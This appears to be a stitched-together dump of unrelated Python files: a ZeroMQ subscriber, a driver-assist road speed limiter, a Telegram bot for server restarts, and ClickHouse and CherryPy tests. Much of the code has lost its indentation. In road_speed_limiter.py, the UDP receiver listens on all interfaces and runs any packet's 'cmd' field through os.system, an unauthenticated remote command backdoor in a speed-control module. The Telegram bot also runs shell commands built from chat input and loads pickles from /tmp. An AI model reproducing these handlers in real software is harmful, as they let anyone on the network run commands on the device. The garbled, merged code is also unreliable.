poll.register(socket, zmq.POLLIN)
        # subscriptions are always set up as part of socket creation
for topic in self._socket_topics:
socket.setsockopt(zmq.SUBSCRIBE, topic.encode())
shutdown = context.socket(zmq.PULL)
shutdown.connect(self._shutdown_uri)
poll.register(shutdown, zmq.POLLIN)
while True:
s = dict(poll.poll())
if shutdown in s:
shutdown.recv()
return # shutdown signal
if socket in s:
self._socket_message_received(socket)
def start_socket(self):
self._thread = threading.Thread(
target=self._socket_worker, args=(self._context, self.socket_uri)
)
self._thread.start()
def stop_socket(self):
self._shutdown.send(b' ') # trigger socket thread shutdown
self._thread = None
def _heartbeat_timer_tick(self):
with self._heartbeat_lock:
self._heartbeat_timer = None # timer is dead on tick
if self.debuglevel > 0:
print('[%s] heartbeat timer tick' % self.debugname)
self._heartbeat_liveness -= 1
if self._heartbeat_liveness == 0:
if self._fsm.isstate('up'):
self._fsm.heartbeat_timeout()
return
if self._fsm.isstate('up'):
self._fsm.heartbeat_tick()
def reset_heartbeat_liveness(self):
self._heartbeat_liveness = self._heartbeat_reset_liveness
def reset_heartbeat_timer(self):
if not self._heartbeat_active:
return
self._heartbeat_lock.acquire()
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
self._heartbeat_timer = None
if self._heartbeat_interval > 0:
self._heartbeat_timer = threading.Timer(
self._heartbeat_interval / 1000.0, self._heartbeat_timer_tick
)
self._heartbeat_timer.start()
self._heartbeat_lock.release()
if self.debuglevel > 0:
print('[%s] heartbeat timer reset' % self.debugname)
def start_heartbeat_timer(self):
self._heartbeat_active = True
self.reset_heartbeat_timer()
def stop_heartbeat_timer(self):
self._heartbeat_active = False
self._heartbeat_lock.acquire()
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
self._heartbeat_timer = None
self._heartbeat_lock.release()
# process all messages received on socket
def _socket_message_received(self, socket):
(identity, msg) = socket.recv_multipart() # identity is topic
try:
self._socket_rx.ParseFromString(msg)
except DecodeError as e:
note = 'Protobuf Decode Error: ' + str(e)
print(note) # TODO: decode error
return
if self.debuglevel > 0:
print('[%s] received message' % self.debugname)
if self.debuglevel > 1:
print(self._socket_rx)
rx = self._socket_rx
# react to any incoming message
if self._fsm.isstate('up'):
self._fsm.any_msg_received()
# react to ping message
if rx.type == pb.MT_PING:
return # ping is uninteresting
# react to full update message
elif rx.type == pb.MT_FULL_UPDATE:
if rx.HasField('pparams'):
interval = rx.pparams.keepalive_timer
self._heartbeat_interval = interval
if self._fsm.isstate('trying'):
self._fsm.full_update_received()
for cb in self.on_socket_message_received:
cb(identity, rx)
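# Illustrative sketch (not part of the original module): minimal wiring of the
# Subscribe class above. The URI and topic are placeholders for whatever the
# machinetalk service actually publishes.
def _example_subscribe_usage():
    sub = Subscribe(debuglevel=1)
    sub.socket_uri = 'tcp://127.0.0.1:5556'   # hypothetical publisher address
    sub.add_socket_topic('status')            # hypothetical topic
    sub.on_socket_message_received.append(lambda topic, rx: print(topic, rx.type))
    sub.on_state_changed.append(lambda state: print('state:', state))
    sub.start()
    # ... run for a while, then ...
    sub.stop()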
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import clip, mean
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
# gps = Thread(target=self.gps_thread, args=[])
# gps.setDaemon(True)
# gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def send_sdp(self, sock):
try:
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
ret = False
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
ret = False
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.send_sdp(sock)
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.started_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
#cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
starting_dist = v_ego * 30.
safe_dist = v_ego * 6.
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
if not self.slowing_down:
self.started_dist = cam_limit_speed_left_dist
self.slowing_down = True
first_started = True
else:
first_started = False
td = self.started_dist - safe_dist
d = cam_limit_speed_left_dist - safe_dist
if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
pp = (d / td) ** 0.6
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter
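# Illustrative sketch (not part of the original module): how a longitudinal
# planner might query the limiter. The cluster speed value is a placeholder.
def _example_query_limiter():
    limiter = get_road_speed_limiter()
    max_speed, limit, left_dist, first_started, log = limiter.get_max_speed(80, True)
    if max_speed > 0:
        print("slowing toward %.0f kph, %.0f m to the camera" % (max_speed, left_dist))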
if __name__ == "__main__":
main()
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
from threading import Thread
import logging
import pickle
import time
import subprocess
from functools import wraps
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext import MessageHandler, Filters
from telegram import ChatAction
from secret import allowed_ids
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
# read the telegram token
with open("token", "r") as fd:
token = fd.readline().strip()
LIST_OF_ADMINS = list(allowed_ids.values())
logging.info("List of admins: {}".format(LIST_OF_ADMINS))
#------------------------------- Telegram wrapper functions -------------------------------
def restricted(func):
@wraps(func)
    def wrapped(bot, update, *args, **kwargs):
        logger = logging.getLogger()
        # handlers in this module use the old-style (bot, update) signature,
        # so the user is taken from the update object
        user_id = update.effective_user.id
        logger.debug("Getting restricted call by {}".format(user_id))
        if user_id not in LIST_OF_ADMINS:
            logger.info("Unauthorized access denied for {}.".format(user_id))
            return
        return func(bot, update, *args, **kwargs)
return wrapped
def send_action(action):
"""Sends `action` while processing func command."""
def decorator(func):
@wraps(func)
def command_func(*args, **kwargs):
bot, update = args
bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)
return func(bot, update, **kwargs)
return command_func
return decorator
send_typing_action = send_action(ChatAction.TYPING)
send_upload_video_action = send_action(ChatAction.UPLOAD_VIDEO)
send_upload_photo_action = send_action(ChatAction.UPLOAD_PHOTO)
#----------------------------- Helper functions -----------------------------
def get_text_from_message(message):
logger = logging.getLogger()
logger.debug("Got message to split: {}".format(message))
text = message.split(" ", 1)[1:]
logger.debug("Text output: {}".format(text))
if text:
return text[0]
else:
return ""
#------------------------------- My functions -------------------------------
class CommandCache(str):
def __init__(self, string):
super().__init__()
self.timestamp = time.time()
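# Illustrative sketch (not part of the original script): CommandCache is a str
# that remembers when it was created; server_status() below uses the timestamp
# to decide whether a pickled result is still fresh.
def _example_command_cache():
    cached = CommandCache("some command output")
    return (time.time() - cached.timestamp) < 10   # True while the cache is fresh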
def execute_shell(cmd):
logger = logging.getLogger()
cmd_list = cmd.strip().split()
# WARNING, this should be sanitized beforehand as this is user input
logger.debug(cmd_list)
try:
out = subprocess.check_output(cmd_list)
return out.decode("utf-8")
except FileNotFoundError:
logger.error("Binary not found")
except subprocess.CalledProcessError:
logger.error("Non-zero exit status")
def restart_servers(servers=""):
logger = logging.getLogger()
now = time.time()
try:
logger.debug("When was the last time this server was restarted")
with open("/tmp/mscs_restarted.pickle", "rb") as f:
last_restarted = pickle.load(f)
if now-last_restarted < 30:
logger.info("Restarted in the last 30s, not restarting.")
ret = "Restarted in the last 30s, not restarting."
        else:
            # the cached timestamp is stale; fall through to the restart below
            raise FileNotFoundError
except (FileNotFoundError, EOFError):
with open("/tmp/mscs_restarted.pickle", "wb") as f:
pickle.dump(now, f)
ret = execute_shell("mscs restart {}".format(servers))
return ret
def server_status(servers=""):
logger = logging.getLogger()
now = time.time()
try:
logger.debug("Trying to read cached command")
with open("/tmp/mscs_status.pickle", "rb") as f:
status = pickle.load(f)
if now-status.timestamp < 10:
logger.info("Cache valid")
ret = status
else:
logger.debug("Cache too old")
raise FileNotFoundError
except (FileNotFoundError, EOFError):
ret = execute_shell("mscs status {}".format(servers))
with open("/tmp/mscs_status.pickle", "wb") as f:
pickle.dump(CommandCache(ret), f)
return ret
# error handling
def error(bot, update, error):
logger = logging.getLogger()
logger.warning('Update "%s" caused error "%s"' % (update, error))
#--------------------------- main function with all handlers ----------------------------
def main():
logger = logging.getLogger()
updater = Updater(token=token)
dispatcher = updater.dispatcher
# Add your other handlers here...
    # MessageHandler will handle plain messages and
    # CommandHandler will handle /commands;
    # telegram.ext.filters are applied beforehand,
    # so that e.g. audio and video never reach the handlers
def stop_and_restart():
"""Gracefully stop the Updater and replace the current process with a new one"""
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(bot, update):
update.message.reply_text('Bot is restarting...')
Thread(target=stop_and_restart).start()
dispatcher.add_handler(CommandHandler('r', restart,
filters=Filters.user(username='@conrad784')))
def start(bot, update):
bot.send_message(chat_id=update.message.chat_id,
text="This Bot is work in progress, expect it not to work!")
logger.info("Started by: {}".format(update.message.from_user))
start_handler = CommandHandler('start', start)
dispatcher.add_handler(start_handler)
def echo(bot, update):
logger.debug("Echoing '{}' to id: {}".format(update.message.text, update.message.chat_id))
bot.send_message(chat_id=update.message.chat_id, text=update.message.text)
echo_handler = MessageHandler(Filters.text, echo)
dispatcher.add_handler(echo_handler)
@restricted
@send_typing_action
def mscs_restart(bot, update):
msg = update.message
servers = get_text_from_message(msg.text)
logger.info("Server restarted by id {}".format(msg.from_user))
logger.debug("With message {}".format(msg.text))
ret = restart_servers(servers)
bot.send_message(chat_id=update.message.chat_id, text="{}".format(ret))
mscs_restart_handler = CommandHandler("mscs_restart", mscs_restart)
dispatcher.add_handler(mscs_restart_handler)
@restricted
@send_typing_action
def mscs_status(bot, update):
msg = update.message
servers = get_text_from_message(msg.text)
logger.info("Server status issued by '{}'".format(msg.from_user))
logger.debug("With message {}".format(msg.text))
ret = server_status(servers)
bot.send_message(chat_id=update.message.chat_id, text="{}".format(ret))
mscs_status_handler = CommandHandler("mscs_status", mscs_status)
dispatcher.add_handler(mscs_status_handler)
def unknown(bot, update):
bot.send_message(chat_id=update.message.chat_id, text="Sorry, I didn't understand that command.")
unknown_handler = MessageHandler(Filters.command, unknown)
dispatcher.add_handler(unknown_handler)
# handle errors
dispatcher.add_error_handler(error)
# start Bot
logger.info("Starting Bot")
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
test.py
|
import threading
import time
import pytest
from helpers.cluster import ClickHouseCluster
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 1})
node2 = cluster.add_instance('node2',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 2})
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
node1.query('CREATE DATABASE test ENGINE=Ordinary') # Different paths with Atomic
node2.query('CREATE DATABASE test ENGINE=Ordinary')
yield cluster
finally:
cluster.shutdown()
def split_tsv(data):
return [x.split("\t") for x in data.splitlines()]
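# Illustrative sketch (not part of the original test file): split_tsv turns the
# tab-separated output of a query into a list of rows.
def _example_split_tsv():
    assert split_tsv("a\tb\n1\t2\n") == [["a", "b"], ["1", "2"]]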
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_merge_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
db_name = "test"
table_name = "merge_simple"
name = db_name + "." + table_name
table_path = "data/" + db_name + "/" + table_name
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_merge_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY sleep(2)
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
node1.query("INSERT INTO {name} VALUES (2)".format(name=name))
node1.query("INSERT INTO {name} VALUES (3)".format(name=name))
parts = ["all_{}_{}_0".format(x, x) for x in range(starting_block, starting_block + 3)]
result_part = "all_{}_{}_1".format(starting_block, starting_block + 2)
def optimize():
node1.query("OPTIMIZE TABLE {name}".format(name=name))
wait = threading.Thread(target=time.sleep, args=(5,))
wait.start()
t = threading.Thread(target=optimize)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=table_name))) == [
[
db_name,
table_name,
"3",
"['{}','{}','{}']".format(*parts),
"['{clickhouse}/{table_path}/{}/','{clickhouse}/{table_path}/{}/','{clickhouse}/{table_path}/{}/']".format(
*parts, clickhouse=clickhouse_path, table_path=table_path),
result_part,
"{clickhouse}/{table_path}/{}/".format(result_part, clickhouse=clickhouse_path, table_path=table_path),
"all",
"0"
]
]
t.join()
wait.join()
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=table_name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_mutation_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
db_name = "test"
table_name = "mutation_simple"
name = db_name + "." + table_name
table_path = "data/" + db_name + "/" + table_name
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_mutation_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY tuple()
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
part = "all_{}_{}_0".format(starting_block, starting_block)
result_part = "all_{}_{}_0_{}".format(starting_block, starting_block, starting_block + 1)
def alter():
node1.query("ALTER TABLE {name} UPDATE a = 42 WHERE sleep(2) OR 1".format(name=name))
t = threading.Thread(target=alter)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=table_name))) == [
[
db_name,
table_name,
"1",
"['{}']".format(part),
"['{clickhouse}/{table_path}/{}/']".format(part, clickhouse=clickhouse_path, table_path=table_path),
result_part,
"{clickhouse}/{table_path}/{}/".format(result_part, clickhouse=clickhouse_path, table_path=table_path),
"all",
"1"
],
]
t.join()
time.sleep(1.5)
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=table_name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
|
test_caching.py
|
import datetime
import gzip
from itertools import count
import os
curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
import sys
import threading
import time
import urllib
import cherrypy
from cherrypy._cpcompat import next, ntob, quote, xrange
from cherrypy.lib import httputil
gif_bytes = ntob(
'GIF89a\x01\x00\x01\x00\x82\x00\x01\x99"\x1e\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x02\x03\x02\x08\t\x00;'
)
from cherrypy.test import helper
class CacheTest(helper.CPWebCase):
def setup_server():
class Root:
_cp_config = {'tools.caching.on': True}
def __init__(self):
self.counter = 0
self.control_counter = 0
self.longlock = threading.Lock()
def index(self):
self.counter += 1
msg = "visit #%s" % self.counter
return msg
index.exposed = True
def control(self):
self.control_counter += 1
return "visit #%s" % self.control_counter
control.exposed = True
def a_gif(self):
cherrypy.response.headers[
'Last-Modified'] = httputil.HTTPDate()
return gif_bytes
a_gif.exposed = True
def long_process(self, seconds='1'):
try:
self.longlock.acquire()
time.sleep(float(seconds))
finally:
self.longlock.release()
return 'success!'
long_process.exposed = True
def clear_cache(self, path):
cherrypy._cache.store[cherrypy.request.base + path].clear()
clear_cache.exposed = True
class VaryHeaderCachingServer(object):
_cp_config = {
'tools.caching.on': True,
'tools.response_headers.on': True,
'tools.response_headers.headers': [
('Vary', 'Our-Varying-Header')
],
}
def __init__(self):
self.counter = count(1)
def index(self):
return "visit #%s" % next(self.counter)
index.exposed = True
class UnCached(object):
_cp_config = {'tools.expires.on': True,
'tools.expires.secs': 60,
'tools.staticdir.on': True,
'tools.staticdir.dir': 'static',
'tools.staticdir.root': curdir,
}
def force(self):
cherrypy.response.headers['Etag'] = 'bibbitybobbityboo'
self._cp_config['tools.expires.force'] = True
self._cp_config['tools.expires.secs'] = 0
return "being forceful"
force.exposed = True
force._cp_config = {'tools.expires.secs': 0}
def dynamic(self):
cherrypy.response.headers['Etag'] = 'bibbitybobbityboo'
cherrypy.response.headers['Cache-Control'] = 'private'
return "D-d-d-dynamic!"
dynamic.exposed = True
def cacheable(self):
cherrypy.response.headers['Etag'] = 'bibbitybobbityboo'
return "Hi, I'm cacheable."
cacheable.exposed = True
def specific(self):
cherrypy.response.headers[
'Etag'] = 'need_this_to_make_me_cacheable'
return "I am being specific"
specific.exposed = True
specific._cp_config = {'tools.expires.secs': 86400}
class Foo(object):
pass
def wrongtype(self):
cherrypy.response.headers[
'Etag'] = 'need_this_to_make_me_cacheable'
return "Woops"
wrongtype.exposed = True
wrongtype._cp_config = {'tools.expires.secs': Foo()}
cherrypy.tree.mount(Root())
cherrypy.tree.mount(UnCached(), "/expires")
cherrypy.tree.mount(VaryHeaderCachingServer(), "/varying_headers")
cherrypy.config.update({'tools.gzip.on': True})
setup_server = staticmethod(setup_server)
def testCaching(self):
elapsed = 0.0
for trial in range(10):
self.getPage("/")
# The response should be the same every time,
# except for the Age response header.
self.assertBody('visit #1')
if trial != 0:
age = int(self.assertHeader("Age"))
self.assert_(age >= elapsed)
elapsed = age
# POST, PUT, DELETE should not be cached.
self.getPage("/", method="POST")
self.assertBody('visit #2')
# Because gzip is turned on, the Vary header should always Vary for
# content-encoding
self.assertHeader('Vary', 'Accept-Encoding')
# The previous request should have invalidated the cache,
# so this request will recalc the response.
self.getPage("/", method="GET")
self.assertBody('visit #3')
# ...but this request should get the cached copy.
self.getPage("/", method="GET")
self.assertBody('visit #3')
self.getPage("/", method="DELETE")
self.assertBody('visit #4')
# The previous request should have invalidated the cache,
# so this request will recalc the response.
self.getPage("/", method="GET", headers=[('Accept-Encoding', 'gzip')])
self.assertHeader('Content-Encoding', 'gzip')
self.assertHeader('Vary')
self.assertEqual(
cherrypy.lib.encoding.decompress(self.body), ntob("visit #5"))
# Now check that a second request gets the gzip header and gzipped body
# This also tests a bug in 3.0 to 3.0.2 whereby the cached, gzipped
# response body was being gzipped a second time.
self.getPage("/", method="GET", headers=[('Accept-Encoding', 'gzip')])
self.assertHeader('Content-Encoding', 'gzip')
self.assertEqual(
cherrypy.lib.encoding.decompress(self.body), ntob("visit #5"))
# Now check that a third request that doesn't accept gzip
# skips the cache (because the 'Vary' header denies it).
self.getPage("/", method="GET")
self.assertNoHeader('Content-Encoding')
self.assertBody('visit #6')
def testVaryHeader(self):
self.getPage("/varying_headers/")
self.assertStatus("200 OK")
self.assertHeaderItemValue('Vary', 'Our-Varying-Header')
self.assertBody('visit #1')
# Now check that different 'Vary'-fields don't evict each other.
# This test creates 2 requests with different 'Our-Varying-Header'
# and then tests if the first one still exists.
self.getPage("/varying_headers/",
headers=[('Our-Varying-Header', 'request 2')])
self.assertStatus("200 OK")
self.assertBody('visit #2')
self.getPage("/varying_headers/",
headers=[('Our-Varying-Header', 'request 2')])
self.assertStatus("200 OK")
self.assertBody('visit #2')
self.getPage("/varying_headers/")
self.assertStatus("200 OK")
self.assertBody('visit #1')
def testExpiresTool(self):
# test setting an expires header
self.getPage("/expires/specific")
self.assertStatus("200 OK")
self.assertHeader("Expires")
# test exceptions for bad time values
self.getPage("/expires/wrongtype")
self.assertStatus(500)
self.assertInBody("TypeError")
# static content should not have "cache prevention" headers
self.getPage("/expires/index.html")
self.assertStatus("200 OK")
self.assertNoHeader("Pragma")
self.assertNoHeader("Cache-Control")
self.assertHeader("Expires")
# dynamic content that sets indicators should not have
# "cache prevention" headers
self.getPage("/expires/cacheable")
self.assertStatus("200 OK")
self.assertNoHeader("Pragma")
self.assertNoHeader("Cache-Control")
self.assertHeader("Expires")
self.getPage('/expires/dynamic')
self.assertBody("D-d-d-dynamic!")
# the Cache-Control header should be untouched
self.assertHeader("Cache-Control", "private")
self.assertHeader("Expires")
# configure the tool to ignore indicators and replace existing headers
self.getPage("/expires/force")
self.assertStatus("200 OK")
# This also gives us a chance to test 0 expiry with no other headers
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
# static content should now have "cache prevention" headers
self.getPage("/expires/index.html")
self.assertStatus("200 OK")
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
# the cacheable handler should now have "cache prevention" headers
self.getPage("/expires/cacheable")
self.assertStatus("200 OK")
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
self.getPage('/expires/dynamic')
self.assertBody("D-d-d-dynamic!")
# dynamic sets Cache-Control to private but it should be
# overwritten here ...
self.assertHeader("Pragma", "no-cache")
if cherrypy.server.protocol_version == "HTTP/1.1":
self.assertHeader("Cache-Control", "no-cache, must-revalidate")
self.assertHeader("Expires", "Sun, 28 Jan 2007 00:00:00 GMT")
def testLastModified(self):
self.getPage("/a.gif")
self.assertStatus(200)
self.assertBody(gif_bytes)
lm1 = self.assertHeader("Last-Modified")
# this request should get the cached copy.
self.getPage("/a.gif")
self.assertStatus(200)
self.assertBody(gif_bytes)
self.assertHeader("Age")
lm2 = self.assertHeader("Last-Modified")
self.assertEqual(lm1, lm2)
# this request should match the cached copy, but raise 304.
self.getPage("/a.gif", [('If-Modified-Since', lm1)])
self.assertStatus(304)
self.assertNoHeader("Last-Modified")
if not getattr(cherrypy.server, "using_apache", False):
self.assertHeader("Age")
def test_antistampede(self):
SECONDS = 4
# We MUST make an initial synchronous request in order to create the
# AntiStampedeCache object, and populate its selecting_headers,
# before the actual stampede.
self.getPage("/long_process?seconds=%d" % SECONDS)
self.assertBody('success!')
self.getPage("/clear_cache?path=" +
quote('/long_process?seconds=%d' % SECONDS, safe=''))
self.assertStatus(200)
start = datetime.datetime.now()
def run():
self.getPage("/long_process?seconds=%d" % SECONDS)
# The response should be the same every time
self.assertBody('success!')
ts = [threading.Thread(target=run) for i in xrange(100)]
for t in ts:
t.start()
for t in ts:
t.join()
self.assertEqualDates(start, datetime.datetime.now(),
# Allow a second (two, for slow hosts)
